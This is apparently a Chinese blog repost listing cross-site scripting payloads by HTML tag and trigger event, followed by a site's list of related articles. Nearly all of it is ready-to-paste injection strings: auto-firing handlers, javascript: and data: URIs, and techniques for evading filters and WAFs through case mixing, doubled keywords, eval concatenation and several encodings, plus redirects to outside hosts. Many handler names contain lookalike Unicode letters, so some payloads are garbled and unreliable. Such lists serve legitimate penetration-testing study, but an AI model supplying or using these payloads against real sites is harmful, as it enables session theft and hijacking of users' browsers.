当前位置：首页 > news >正文

xss常用标签和触发事件

news 2025/10/14 23:50:44

无过滤情况
<script>
<scirpt>alert("xss");</script>

<img>
图片加载错误时触发
<img src="x" οnerrοr=alert(1)>
<img src="1" οnerrοr=eval("alert('xss')")>
鼠标指针移动到元素时触发
<img src=1 οnmοuseοver="alert(1)">
鼠标指针移出时触发
<img src=1 οnmοuseοut="alert(1)">

<input>
<input οnfοcus="alert('xss');">
竞争焦点，从而触发onblur事件
<input οnblur=alert("xss") autofocus><input autofocus>
通过autofocus属性执行本身的focus事件，这个向量是使焦点自动跳到输入元素上,触发焦点事件，无需用户去触发
<input οnfοcus="alert('xss');" autofocus>
<input name="name" value="">
<input value="" οnclick=alert('xss') type="text">
<input name="name" value="" οnmοuseοver=prompt('xss') bad="">
<input name="name" value=""><script>alert('xss')</script>
按下按键时触发
<input type="text" οnkeydοwn="alert(1)">
按下按键时触发
<input type="text" οnkeypress="alert(1)">
松开按键式时触发
<input type="text" οnkeyup="alert(1)">

<from>
<form action=javascript:alert('xss') method="get">
<form action=javascript:alert('xss')>
<form method=post action=aa.asp? οnmοuseοver=prompt('xss')>
<form method=post action=aa.asp? οnmοuseοver=alert('xss')>
<form action=1 οnmοuseοver=alert('xss)>
<form method=post action="data:text/html;base64,<script>alert('xss')</script>">
<form method=post action="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">

<body>
<body οnlοad="alert(1)">
利用换行符以及autofocus，自动去触发onscroll事件，无需用户去触发
<body οnscrοll=alert("xss");><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>

<button>
元素上点击鼠标时触发
<button οnclick="alert(1)">text</button>

<p>
元素上按下鼠标时触发
<p οnmοusedοwn="alert(1)">text</p>
元素上释放鼠标时触发
<p οnmοuseup="alert(1)">text</p>

<details>
<details οntοggle="alert('xss');">
使用open属性触发ontoggle事件，无需用户去触发
<details open οntοggle="alert('xss');">

<select>
<select οnfοcus=alert(1)></select>
通过autofocus属性执行本身的focus事件，这个向量是使焦点自动跳到输入元素上,触发焦点事件，无需用户去触发
<select οnfοcus=alert(1) autofocus>

<keygen>
<keygen autofocus οnfοcus=alert(1)> //仅限火狐

<marquee>
<marquee onstart=alert("xss")></marquee> //Chrome不行，火狐和IE都可以

<isindex>
<isindex type=image src=1 οnerrοr=alert("xss")>//仅限于IE

利用link远程包含js文件
在无CSP的情况下才可以
<link rel=import href="http://127.0.0.1/1.js">

javascript伪协议
<a>标签
<a href="javascript:alert('xss');">xss</a>
<iframe>标签
<iframe src=javascript:alert('xss');></iframe>
<img>标签
<img src=javascript:alert('xss')>//IE7以下
<form>标签
<form action="Javascript:alert(1)"><input type=submit>

expression属性
<img style="xss:expression(alert('xss''))"> // IE7以下
<div style="color:rgb('' x:expression(alert(1))"></div> //IE7以下
<style>#test{x:expression(alert(/XSS/))}</style> // IE7以下

background属性
<table background=javascript:alert(1)></table> //在Opera 10.5和IE6上有效

存在过滤情况
过滤空格
用 / 代替空格
<img/src="x"/οnerrοr=alert("xss");>

过滤关键字
大小写绕过
<ImG sRc=x onerRor=alert("xss");>
双写关键字(有些waf可能会只替换一次且是替换为空，这种情况下我们可以考虑双写关键字绕过)
<imimgg srsrcc=x οnerrοr=alert("xss");>
字符拼接(利用eval)
<img src="x" οnerrοr="a=aler;b=t;c='(xss);';eval(a+b+c)">
字符拼接(利用top)
<script>top["al"+"ert"](``xss``);</script>(只有两个``这里是为了凸显出有`符号)

其它字符混淆
有的waf可能是用正则表达式去检测是否有xss攻击，如果我们能fuzz出正则的规则，则我们就可以使用其它字符去混淆我们注入的代码了
下面举几个简单的例子
可利用注释、标签的优先级等
<<script>alert("xss");//<</script>
<script>alert("hello world!")</script>
<title><img src=</title>><img src=x οnerrοr="alert(``xss``);"> 因为title标签的优先级比img的高，所以会先闭合title，从而导致前面的img标签无效
<SCRIPT>var a="\\";alert("xss");//";</SCRIPT>

编码绕过
Unicode编码绕过
<img src="x" οnerrοr="alert("xss");">
<img src="x" οnerrοr="eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029\u003b')">
url编码绕过
<img src="x" οnerrοr="eval(unescape('%61%6c%65%72%74%28%22%78%73%73%22%29%3b'))">
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
Ascii码绕过
<img src="x" οnerrοr="eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,59))">
Hex绕过
<img src=x οnerrοr=eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')>
八进制绕过
<img src=x οnerrοr=alert('\170\163\163')>
base64绕过
<img src="x" οnerrοr="eval(atob('ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly93d3cuYmFpZHUuY29tJw=='))">
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">

过滤双引号，单引号
如果是html标签中，我们可以不用引号；如果是在js中，我们可以用反引号代替单双引号
<img src="x" οnerrοr=alert(``xss``);>
使用编码绕过，具体看上面列举的例子

过滤括号
当括号被过滤的时候可以使用throw来绕过
<svg/οnlοad="window.οnerrοr=eval;throw'=alert\x281\x29';">

过滤url地址
使用url编码
<img src="x" οnerrοr=document.location=``http://%77%77%77%2e%62%61%69%64%75%2e%63%6f%6d/``>
使用IP
<img src="x" οnerrοr=document.location=``http://2130706433/``>十进制
<img src="x" οnerrοr=document.location=``http://0177.0.0.01/``>八进制
<img src="x" οnerrοr=document.location=``http://0x7f.0x0.0x0.0x1/``>十六进制
<img src="x" οnerrοr=document.location=``//www.baidu.com``>html标签中用//可以代替http://
使用\ (注意：在windows下\本身就有特殊用途，是一个path 的写法，所以\在Windows下是file协议，在linux下才会是当前域的协议)
使用中文逗号代替英文逗号
<img src="x" οnerrοr="document.location=``http://www。baidu。com``">//会自动跳转到百度

xss常用标签和触发事件

相关文章：

xss常用标签和触发事件

WPF中Binding的原理和应用

探索设计模式的魅力：深度挖掘响应式模式的潜力，从而精准优化AI与机器学习项目的运行效能，引领技术革新潮流

《经典论文阅读2》基于随机游走的节点表示学习—Deepwalk算法

Java实现二叉树（下）

Hello 算法10：搜索

常见分类算法详解

推送恶意软件的恶意 PowerShell 脚本看起来是人工智能编写的

微服务之Consul 注册中心介绍以及搭建

MES生产管理系统：私有云、公有云与本地化部署的比较分析

【core analyzer】core analyzer的介绍和安装详情

个人练习之-jenkins

初探vercel托管项目

软考 - 系统架构设计师 - 质量属性例题 (2)

基于Python豆瓣电影数据可视化分析系统的设计与实现

【已开源】基于stm32f103的爬墙小车

PCL 基于马氏距离KMeans点云聚类

libVLC 视频窗口上叠加透明窗口

MySQL基础入门上篇

Docker搭建FFmpeg

观成科技：隐蔽隧道工具Ligolo-ng加密流量分析

MPNet：旋转机械轻量化故障诊断模型详解python代码复现

Leetcode 3576. Transform Array to All Equal Elements

可靠性+灵活性：电力载波技术在楼宇自控中的核心价值

学校招生小程序源码介绍

学习STC51单片机31（芯片为STC89C52RCRC）OLED显示屏1

什么是Ansible Jinja2

HashMap中的put方法执行流程（流程图）

ubuntu22.04有线网络无法连接，图标也没了

GraphQL 实战篇：Apollo Client 配置与缓存